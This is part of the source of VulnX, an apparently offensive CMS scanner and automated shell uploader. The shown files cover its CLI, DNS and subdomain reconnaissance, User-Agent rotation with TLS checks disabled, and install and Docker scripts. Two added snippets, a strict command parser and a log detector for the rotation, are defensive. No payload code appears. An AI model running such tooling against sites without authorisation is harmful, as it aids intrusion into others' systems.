537 |                 self.setdorkCLI(cmd)
538 |             elif exit_regx.search(cmd) or cmd == 'quit':
539 |                 sys.exit()
540 |             elif help_regx.search(cmd) or cmd == '?':
541 |                 Helpers._general_help()
542 |             elif cls_regx.search(cmd) or cmd == 'cls':
543 |                 Cli._clearscreen()
544 |             elif history_regx.search(cmd):
545 |                 for i in range(len(history)):
546 |                     print(" %s %s"%(i+1,history[i]))
547 |             elif exec_regx.search(cmd):
548 |                 Cli._exec(cmd)
549 |             elif var_regx.search(cmd):
550 |                 Cli.global_variables(dorkname,output_dir,numberpage,url,timeout)
551 |             else:
552 |                 print("use (help) (?) to show man commands.")
553 |
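Added example, not part of the vulnx code base: the command patterns in cli.py are anchored only at the start of the line (`^back`, `^run`, `^exit`, ...), so any input that merely begins with a verb is dispatched as that verb. The sketch below contrasts that with whole-line matching; `legacy_matches`, `parse_command` and the argument validators are hypothetical names and assumptions, and the `exec` argument is tokenised with `shlex` so it can be handed to `subprocess.run` as an argument list rather than a shell string.

```python
import re
import shlex

# Prefix patterns copied from cli.py; none is anchored at the end of the line.
LEGACY = {
    "back": re.compile(r"^back"),
    "run": re.compile(r"^run"),
    "list": re.compile(r"^list"),
    "help": re.compile(r"^help"),
    "exit": re.compile(r"^exit"),
    "dork": re.compile(r"^dork"),
}


def legacy_matches(line):
    """Verbs the original prefix regexes would fire for this input line."""
    return [verb for verb, rx in LEGACY.items() if rx.search(line)]


# Assumed strict grammar: a bare verb must be the whole line.
BARE_VERBS = {"help", "?", "clear", "cls", "history", "variables",
              "back", "run", "list", "dork", "exit", "quit"}

# Verbs taking one argument, each with a validator applied to the whole argument.
# The character classes are assumptions chosen for this example.
ARG_VERBS = {
    "set url": re.compile(r"\S+"),
    "set dork": re.compile(r"\w+"),
    "page": re.compile(r"\d{1,3}"),
    "output": re.compile(r"\w+"),   # same class as cli.py: no path separators
}

UNKNOWN = ("unknown", None)


def parse_command(line):
    """Return (verb, argument) for a recognised line, else ("unknown", None)."""
    line = line.strip()
    if line in BARE_VERBS:
        return (line, None)
    if line.startswith("exec "):
        try:
            argv = shlex.split(line[len("exec "):])
        except ValueError:          # unbalanced quotes
            return UNKNOWN
        return ("exec", argv) if argv else UNKNOWN
    for verb, validator in ARG_VERBS.items():
        prefix = verb + " "
        if line.startswith(prefix):
            arg = line[len(prefix):].strip()
            if validator.fullmatch(arg):
                return (verb, int(arg) if verb == "page" else arg)
            return UNKNOWN
    return UNKNOWN


if __name__ == "__main__":
    # Constructed sample input lines.
    for sample in ["back", "background", "page 3", "output ../logs",
                   "set dork blaze", "exec ls -la logs"]:
        print("%-18r legacy=%-10s strict=%s"
              % (sample, legacy_matches(sample), parse_command(sample)))
```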
--------------------------------------------------------------------------------
/common/__init__.py:
--------------------------------------------------------------------------------
1 | """The vulnx commonfiles."""
2 |
--------------------------------------------------------------------------------
/common/banner.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from common.colors import bannerblue , bannerblue2 ,W ,Y ,R,end
3 |
4 | def banner():
5 |     print("""%s
6 |
7 | .:. .:,
8 | xM; XK.
9 | dx' .lO.
10 | do ,0.
11 | .c.lN' , '. .k0.:'
12 | xMMk;d;''cOM0kWXl,',locMMX.
13 | .NMK. :WMMMMMMMx dMMc
14 | lMMO lWMMMMMMMMMO. lMMO
15 | cWMxxMMMMMMMMMMMMKlWMk
16 | .xWMMMMMMMMMMMMMMM0,%s
17 | .,OMd,,,;0MMMO,.
18 | .l0O.%sVXVX%sOX.%sVXVX%s0MO%sVXVX%s.0Kd,
19 | lWMMO0%sVXVX0%sOX.%sVXVX%sl%sVXVX%s.VXNMMO
20 | .MMX;.N0%sVXVX0%s0X.%sVXVXVX0%s.0M:.OMMl
21 | .OXc ,MMO%sVXVX0%sVX%s .VXVX0%s0MMo ,0X'
22 | 0x. :XMMMk%sVXVX.%sXO.%sVXVX%sdMMMWo. :X'
23 | .d 'NMMMMMMk%sVXVX%s..%sVXVX0%s.XMMMMWl ;c
24 | 'NNoMMMMMMx%sVXVXVXVXVX0.%sXMMk0Mc
25 | .NMx OMMMMMMd%sVXVXVX%sl%sVXVX%s.NW.;MMc
26 | :NMMd .NMMMMMMd%sVXVX%sdMd,,,,oc ;MMWx
27 | .0MN, 'XMMMMMMo%sVX%soMMMMMMWl 0MW,
28 | .0. .xWMMMMM:lMMMMMM0, kc
29 | ,O. .:dOKXXXNKOxc. do
30 | '0c -VulnX- ,Ol
31 | ;. :.
32 |
33 | %s# Coded By Anouar Ben Saad -%s @anouarbensaad
34 | %s"""
35 | %
36 | (bannerblue,bannerblue2,
37 | W,bannerblue2,W,bannerblue2,W,bannerblue2,
38 | W,bannerblue2,W,bannerblue2,W,bannerblue2,
39 | W,bannerblue2,W,bannerblue2,
40 | W,bannerblue2,W,bannerblue2,
41 | W,bannerblue2,W,bannerblue2,
42 | W,bannerblue2,W,bannerblue2,
43 | W,bannerblue2,
44 | W,bannerblue2,W,bannerblue2,
45 | W,bannerblue2,
46 | W,bannerblue2,
47 | W,Y,end
48 | ))
49 |
--------------------------------------------------------------------------------
/common/colors.py:
--------------------------------------------------------------------------------
1 | '''
2 | Module Of Colors.
3 | OS : Ubuntu
4 | '''
5 |
6 | import sys
7 |
8 | if sys.platform.lower().startswith(('os', 'win', 'darwin', 'ios')):
9 | # Colors shouldn't be displayed on Mac and Windows
10 | bannerblue = bannerblue2 = yellowhead = \
11 | W = Y = R = G = B = bg = green = \
12 | run = good = bad = info = red = end = que = \
13 | failexploit = vulnexploit = portopen = portclose = ''
14 | else:
15 | #banner Colors
16 | bannerblue = '\033[34m'
17 | bannerblue2 = '\033[1;1;94m'
18 | yellowhead = '\033[1;1;94m'
19 | #default colors
20 | W = '\033[97m' # white
21 | Y = '\033[93m' # yellow
22 | R = '\033[91m'
23 | G = '\033[92m'
24 | B = '\033[94m'
25 | bg = '\033[7;91m'
26 | green = '\033[92m'
27 | #action colors
28 | run = '\033[93m[~]\033[0m'
29 | good = '\033[92m[+]\033[0m'
30 | bad = '\033[91m[-]\033[0m'
31 | info = '\033[93m[!]\033[0m'
32 | red = '\033[91m'
33 | end = '\033[0m'
34 | que = '\033[94m[?]\033[0m'
35 | #test colors
36 | failexploit = '\033[91mFAIL\033[0m'
37 | vulnexploit = '\033[92mVULN\033[0m'
38 | portopen = '\033[92mOPEN \033[0m'
39 | portclose = '\033[91mCLOSE\033[0m'
40 |
--------------------------------------------------------------------------------
/common/output_wr.py:
--------------------------------------------------------------------------------
1 |
2 | import os
3 | import sys
4 |
5 | def writelogs(data, data_name, output_dir):
6 |     """Write each non-empty result list to <output_dir>/<name>.txt."""
7 |     for items, name in zip(data, data_name):
8 |         if items:
9 |             filepath = os.path.join(output_dir, name + '.txt')
10 |             with open(filepath, 'w+', encoding='utf-8') as out_file:
11 |                 joined = '\n'.join(items)
12 |                 out_file.write(joined)
13 |                 out_file.write('\n')
--------------------------------------------------------------------------------
/common/requestUp.py:
--------------------------------------------------------------------------------
1 |
2 | import random
3 | import requests
4 | from requests.exceptions import TooManyRedirects
5 | from common.uriParser import parsing_url as hostd
6 |
7 | SESSION = requests.Session()
8 | SESSION.max_redirects = 2
9 |
10 | def random_UserAgent():
11 | useragents_rotate = [
12 | "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
13 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
14 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
15 | "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
16 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
17 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
18 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
19 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)",
20 | "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
21 | "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
22 | "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
23 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36",
24 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
25 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
26 | "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36",
27 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
28 | "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
29 | "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01"
30 | ]
31 | useragents_random = random.choice(useragents_rotate)
32 | return useragents_random
33 |
34 | def getrequest(
35 |     url,
36 |     headers,
37 |     timeout=3,
38 | ):
39 |     """GET request without TLS certificate verification."""
40 |     headers = headers or {}  # keep the caller's headers instead of discarding them
41 |     def get(url):
42 |         # verify=False: the server certificate is not validated
43 |         response = SESSION.get(
44 |             url,
45 |             headers=headers,
46 |             verify=False,
47 |             timeout=timeout,
48 |             stream=True,
49 |         )
50 |         return response.text
51 |     return get(url)
52 |
53 | def sendrequest(
54 |     url,
55 |     headers=None,
56 |     data=None,
57 |     timeout=3,
58 | ):
59 |     """POST request without TLS certificate verification."""
60 |     headers = headers or {}  # keep the caller's headers
61 |     data = data or {}  # keep the caller's form data
62 |     def post(url):
63 |         response = SESSION.post(
64 |             url,
65 |             data=data,
66 |             headers=headers,
67 |             verify=False,
68 |             timeout=timeout,
69 |             stream=True,
70 |         )
71 |         return response.text
72 |     return post(url)
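
A defender-side check for the client behaviour in random_UserAgent() above, as an added example that is not part of the VulnX code base: it scans combined-format access logs for source addresses that present several different User-Agent strings from that rotation list. The log lines, the addresses and the names rotating_clients, ROTATION_UAS and SAMPLE_LOG are constructed for illustration.

```python
import re
from collections import defaultdict

# Subset of the strings in useragents_rotate above (the long-obsolete,
# most distinctive ones). Extend with the full list for production use.
ROTATION_UAS = {
    "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)",
    "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
    "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
    "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01",
}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def rotating_clients(lines, min_distinct=2):
    """Return {ip: sorted rotation-list UAs seen} for every source address
    that sent at least min_distinct different User-Agents from ROTATION_UAS.

    One address switching between several long-dead browsers is a much
    stronger signal than a single hit on any one of these strings.
    """
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed or non-combined line: ignore
        if m.group("ua") in ROTATION_UAS:
            seen[m.group("ip")].add(m.group("ua"))
    return {ip: sorted(uas) for ip, uas in seen.items()
            if len(uas) >= min_distinct}


# Constructed sample input (documentation address ranges, made-up requests).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"',
    '192.0.2.10 - - [12/Mar/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 801 "-" '
    '"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01"',
    '192.0.2.10 - - [12/Mar/2024:10:00:03 +0000] "GET /robots.txt HTTP/1.1" 404 310 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02"',
    '198.51.100.7 - - [12/Mar/2024:10:01:10 +0000] "GET / HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"',
    '198.51.100.7 - - [12/Mar/2024:10:01:12 +0000] "GET /about HTTP/1.1" 200 2210 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"',
    '203.0.113.5 - - [12/Mar/2024:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" '
    '"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for ip, uas in rotating_clients(SAMPLE_LOG).items():
        print(ip, "rotated through", len(uas), "listed User-Agents")
```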
--------------------------------------------------------------------------------
/common/threading.py:
--------------------------------------------------------------------------------
1 | import concurrent.futures
2 |
3 | from common.colors import info
4 |
5 | def threads(function, thread_count):
6 |     """Run function in a thread pool and report progress."""
7 |     threads = concurrent.futures.ThreadPoolExecutor(
8 |         max_workers=thread_count)
9 |     confuture = [threads.submit(function)]  # as_completed() needs an iterable of futures
10 |     for i, _ in enumerate(concurrent.futures.as_completed(confuture)):
11 |         print('%s Progress IN : %i' % (info, i + 1), end='\r')
12 |     print('')
--------------------------------------------------------------------------------
/common/uriParser.py:
--------------------------------------------------------------------------------
1 | import re
2 | from urllib.parse import urlparse
3 |
4 | def parsing_url(url):
5 | host = urlparse(url).netloc
6 | return host
7 |
--------------------------------------------------------------------------------
/config/vulnx.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=vulnx
3 | Comment=VulnX 🕷️ Cms and vulnerabilites detector, & An intelligent bot auto shell injector.
4 | Encoding=UTF-8
5 | Exec=sh -c "vulnx;${SHELL:-bash}"
6 | Icon=vulnxicon.png
7 | StartupNotify=false
8 | Terminal=true
9 | Type=Application
10 | Categories=02-Vulnerability-Analysis;
11 | X-Kali-Package=vulnx
12 | Name[C]=vulnx
13 |
--------------------------------------------------------------------------------
/config/vulnxicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/config/vulnxicon.png
--------------------------------------------------------------------------------
/docker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3-alpine
2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com
3 |
4 | # Project Informations.
5 | LABEL name vulnx
6 | LABEL src "https://github.com/anouarbensaad/vulnx"
7 | LABEL creator anouarbensaad
8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\
9 | fast cms detection of target and fast scanner and informations gathering like\
10 | subdomains, \
11 | ipaddresses,\
12 | country, \
13 | org, \
14 | timezone, \
15 | region, \
16 | ans \
17 | and more ...\
18 | Instead of injecting shell and checking it works like all the other tools do,\
19 | vulnx analyses the response with and recieve if shell success uploaded or no.\
20 | vulnx is searching for urls with dorks."
21 |
22 | # Cloning Vulnx From Github
23 | RUN apk add --no-cache git && \
24 | git clone https://github.com/anouarbensaad/vulnx.git
25 |
26 | # Make vulnx group
27 | RUN addgroup vulnx
28 |
29 | # added \\vulnx [group] secondary group to vulnx.
30 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx
31 |
32 | # change vulnx owner of directory of project.
33 | RUN chown -R vulnx vulnx
34 |
35 | # Switch user.
36 | USER vulnx
37 |
38 | ENV APP_HOME=vulnx
39 |
40 | # Working-Directory
41 | WORKDIR $APP_HOME
42 |
43 | # Install Pip Packages.
44 | RUN pip install --user --upgrade pip && \
45 | pip install --user -r ./requirements.txt
46 |
47 | # Add Mount Volume Docker To Save All changes.
48 | VOLUME [ "/vulnx" ]
49 |
50 | # Entrypoint -> Command : While Creating Container.
51 | ENTRYPOINT [ "python", "vulnx.py" ]
52 |
53 | # Default Command When Starting The Container.
54 | CMD ["--help"]
55 |
--------------------------------------------------------------------------------
/docker/README:
--------------------------------------------------------------------------------
1 | ### Docker Documentation.
2 | Welcome to the vulnx Docker documentation.
3 | This documentation describes how to use vulnx with Docker.
4 |
5 | You can build the Docker image and run a container to avoid compatibility problems:
6 | $ docker build -t vulnx ./docker/
7 | $ docker run -it --name vulnx vulnx:latest -u http://example.com
8 |
--------------------------------------------------------------------------------
/docker/debian_stretch/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian:stretch-slim
2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com
3 |
4 | # Project Informations.
5 | LABEL name vulnx
6 | LABEL src "https://github.com/anouarbensaad/vulnx"
7 | LABEL creator anouarbensaad
8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\
9 | fast cms detection of target and fast scanner and informations gathering like\
10 | subdomains, \
11 | ipaddresses,\
12 | country, \
13 | org, \
14 | timezone, \
15 | region, \
16 | ans \
17 | and more ...\
18 | Instead of injecting shell and checking it works like all the other tools do,\
19 | vulnx analyses the response with and recieve if shell success uploaded or no.\
20 | vulnx is searching for urls with dorks."
21 |
22 | # Install Git,
23 | RUN apt-get update -qq && \
24 | apt-get install -qq -y --no-install-recommends --no-install-suggests \
25 | git && \
26 | rm -rf /var/lib/apt/lists/* && \
27 | apt-get clean && \
28 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/*
29 |
30 | # Make Vulnx Directory & Cloning Vulnx From Github
31 | RUN mkdir -p /usr/share/vulnx && cd usr/share/vulnx && \
32 | git clone https://www.github.com/anouarbensaad/vulnx
33 |
34 | # Make vulnx group
35 | RUN addgroup vulnx
36 |
37 | # added \\vulnx [group] secondary group to vulnx.
38 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx
39 |
40 | # change vulnx owner of directory of project.
41 | RUN chown -R vulnx vulnx
42 |
43 | # Switch user.
44 | USER vulnx
45 |
46 | # Working-Directory
47 | WORKDIR vulnx
48 |
49 | # Install Python3 & Pip 3
50 | RUN apt-get -qq update && \
51 | apt-get install -qq -y --no-install-recommends \
52 | python3 \
53 | python3-pip && \
54 | rm -rf /var/lib/apt/lists/* && \
55 | apt-get clean && \
56 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/*
57 |
58 | # Install Pip Packages.
59 | RUN pip3 install requests && \
60 | pip3 install bs4
61 |
62 | # Add Mount Volume Docker To Save All changes.
63 | VOLUME [ "/vulnx" ]
64 |
65 | #run container with it mode & run python3 vulnx.py -u ...
66 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | red="\e[0;31m"
4 | blue="\e[0;94m"
5 | green="\e[0;32m"
6 | off="\e[0m"
7 | #vulnx install function for Android. termux
8 | function banner(){
9 | echo -e "===== VULNX INSTALL ====="
10 | }
11 | function termuxOS() {
12 | echo -e "$red [$green+$red]$off Installing Python ...";
13 | pkg install python
14 | echo -e "$red [$green+$red]$off Installing Packages ...";
15 | pip install -r ./requirements.txt
16 | echo -e "$red [$green+$red]$off Checking directories ..."
17 | if [ -e "/data/data/com.termux/files/usr/share/vulnx" ]; then
18 | echo -e "$red [$green+$red]$off A previous installation was found Do you want to replace it? [Y/n]: "
19 | read replace
20 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then
21 | rm -r "/data/data/com.termux/files/usr/share/vulnx"
22 | rm "/data/data/com.termux/files/usr/bin/vulnx"
23 | else
24 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations";
25 | echo -e "$red [$green✘$red]$off Installation Failed";
26 | exit
27 | fi
28 | fi
29 | echo -e "$red [$green+$red]$off Installing ...";
30 | mkdir "/data/data/com.termux/files/usr/share/vulnx"
31 | cp "vulnx.py" "/data/data/com.termux/files/usr/share/vulnx"
32 | cp "install.sh" "/data/data/com.termux/files/usr/share/vulnx"
33 | cp "update.sh" "/data/data/com.termux/files/usr/share/vulnx"
34 | cp -r "./common" "/data/data/com.termux/files/usr/share/vulnx"
35 | cp -r "./modules" "/data/data/com.termux/files/usr/share/vulnx"
36 | cp -r "./shell" "/data/data/com.termux/files/usr/share/vulnx"
37 | chmod +x /data/data/com.termux/files/usr/share/vulnx/update.sh
38 | echo -e "$red [$green+$red]$off Creating Symbolic Link ...";
39 | echo "#!/data/data/com.termux/files/usr/bin/bash
40 | python /data/data/com.termux/files/usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx";
41 | cp "vulnx" "/data/data/com.termux/files/usr/bin"
42 | chmod +x "/data/data/com.termux/files/usr/bin/vulnx"
43 | rm "vulnx";
44 | if [ -d "/data/data/com.termux/files/usr/share/vulnx" ] ;
45 | then
46 | echo -e "$red [$green+$red]$off Tool successfully installed and will start in 5s!";
47 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"
48 | sleep 5;
49 | vulnx
50 | else
51 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
52 | exit
53 | fi
54 | }
55 | #vulnx install function for debian operating system. linux.
56 | function debianOS(){
57 | echo -e "$red [$green+$red]$off Installing python3... ";
58 | sudo apt-get install -y python3
59 | pip install -r ./requirements.txt
60 | echo -e "$red [$green+$red]$off Checking directories... "
61 | if [ -d "/usr/share/vulnx" ]; then
62 | echo -e "$red [$green+$red]$off A Directory VulnX Was Found! Do You Want To Replace It? [Y/n]:" ;
63 | read replace
64 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then
65 | sudo rm -r "/usr/share/vulnx"
66 | sudo rm "/usr/share/icons/vulnxicon.png"
67 | sudo rm "/usr/share/applications/vulnx.desktop"
68 | sudo rm "/usr/local/bin/vulnx"
69 | else
70 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations";
71 | echo -e "$red [$green✘$red]$off Installation Failed";
72 | exit
73 | fi
74 | fi
75 | echo -e "$red [$green+$red]$off Installing ...";
76 | echo -e "$red [$green+$red]$off Creating Symbolic Link ...";
77 | echo -e "#!/bin/bash
78 | python3 /usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx";
79 | chmod +x "vulnx";
80 | sudo mkdir "/usr/share/vulnx"
81 | sudo cp "install.sh" "/usr/share/vulnx"
82 | sudo cp "update.sh" "/usr/share/vulnx"
83 | sudo cp -r "./common" "/usr/share/vulnx/"
84 | sudo cp -r "./modules" "/usr/share/vulnx/"
85 | sudo cp -r "./shell" "/usr/share/vulnx/"
86 | sudo chmod +x /usr/share/vulnx/update.sh
87 | sudo cp "vulnx.py" "/usr/share/vulnx"
88 | sudo cp "config/vulnxicon.png" "/usr/share/icons"
89 | sudo cp "config/vulnx.desktop" "/usr/share/applications"
90 | sudo cp "vulnx" "/usr/local/bin/"
91 | rm "vulnx";
92 | if [ -d "/usr/share/vulnx" ] ;
93 | then
94 | echo -e "$red [$green+$red]$off Tool Successfully Installed And Will Start In 5s!";
95 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"
96 | sleep 5;
97 | vulnx
98 | else
99 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
100 | exit
101 | fi
102 | }
103 | #main
104 | if [ -d "/data/data/com.termux/files/usr/" ]; then
105 | banner
106 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
107 | termuxOS
108 | elif [ -d "/usr/bin/" ];then
109 | banner
110 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System";
111 | debianOS
112 | else
113 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !";
114 | exit
115 | fi
116 |
--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
1 | """The vulnx Modules."""
2 |
--------------------------------------------------------------------------------
/modules/dnsLookup.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import base64
4 | import json
5 | from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que , bannerblue
6 | from bs4 import BeautifulSoup
7 | from common.uriParser import parsing_url as hostd
8 |
9 | def results(table):
10 | res = []
11 | trs = table.findAll('tr')
12 | for tr in trs:
13 | tds = tr.findAll('td')
14 | pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'
15 | try:
16 | ip = re.findall(pattern_ip, tds[1].text)[0]
17 | domain = str(tds[0]).split('<br/>')[0].split('>')[1]
18 | header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:])
19 | reverse_dns = tds[1].find('span', attrs={}).text
20 |
21 | additional_info = tds[2].text
22 | country = tds[2].find('span', attrs={}).text
23 | autonomous_system = additional_info.split(' ')[0]
24 | provider = ' '.join(additional_info.split(' ')[1:])
25 | provider = provider.replace(country, '')
26 | data = {'domain': domain,
27 | 'ip': ip,
28 | 'reverse_dns': reverse_dns,
29 | 'as': autonomous_system,
30 | 'provider': provider,
31 | 'country': country,
32 | 'header': header}
33 | res.append(data)
34 | except:
35 | pass
36 | return res
37 |
38 | def text_record(table):
39 | res = []
40 | for td in table.findAll('td'):
41 | res.append(td.text)
42 | return res
43 |
44 |
45 | def dnsdumper(url):
46 | domain = hostd(url)
47 | dnsdumpster_url = 'https://dnsdumpster.com/'
48 | response = requests.Session().get(dnsdumpster_url)
49 | soup = BeautifulSoup(response.text, 'html.parser')
50 | # If no match is found, the return object won't have group method, so check.
51 | try:
52 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value']
53 | except AttributeError: # No match is found
54 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value']
55 | print (' %s Retrieved token: %s' % (info,csrf_token))
56 | cookies = {'csrftoken': csrf_token}
57 | headers = {'Referer': 'https://dnsdumpster.com/'}
58 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain }
59 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers)
60 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
61 | if response.status_code == 200:
62 | soup = BeautifulSoup(response.content, 'html.parser')
63 | tables = soup.findAll('table')
64 | res = {}
65 | res['domain'] = domain
66 | res['dns_records'] = {}
67 | res['dns_records']['dns'] = results(tables[0])
68 | res['dns_records']['mx'] = results(tables[1])
69 | print(' %s Search for DNS Servers' % que)
70 | for entry in res['dns_records']['dns']:
71 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
72 | print(' %s Search for MX Records ' % que)
73 | for entry in res['dns_records']['mx']:
74 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end)))
75 | def domain_info(url):
76 | domain = hostd(url)
77 | dnsdumpster_url = 'https://dnsdumpster.com/'
78 | response = requests.Session().get(dnsdumpster_url).text
79 | # If no match is found, the return object won't have group method, so check.
80 | try:
81 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1)
82 | except AttributeError: # No match is found
83 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response)
84 | cookies = {'csrftoken': csrf_token}
85 | headers = {'Referer': 'https://dnsdumpster.com/'}
86 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain }
87 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers)
88 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
89 | if response.status_code == 200:
90 | soup = BeautifulSoup(response.content, 'html.parser')
91 | tables = soup.findAll('table')
92 | res = {}
93 | res['domain'] = domain
94 | res['dns_records'] = {}
95 | res['dns_records']['host'] = results(tables[3])
96 | print(' %s SubDomains' % que)
97 | for entry in res['dns_records']['host']:
98 | print((" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s".format(**entry)% (good,good,bannerblue,end)))
99 |
--------------------------------------------------------------------------------
/modules/dorksEngine.py:
--------------------------------------------------------------------------------
1 | '''
2 | Dorks Engine Module.
3 | github Repository : http://github.com/anouarbensaad/findorks
4 | '''
5 |
6 | import requests
7 | import re
8 | import time
9 | import random
10 | import os
11 | from common.colors import run,W,end,good,bad,que,info,bannerblue
12 | from common.uriParser import parsing_url as parsify
13 | filename = time.strftime("%Y-%m-%d-%H%M%S-Dorks")
14 | output_dirdorks = 'logs'+'/Dorks'
15 |
16 | if not os.path.exists(output_dirdorks): # if the directory doesn't exist
17 | os.mkdir(output_dirdorks) # create a new directory
18 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w')
19 | else:
20 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w')
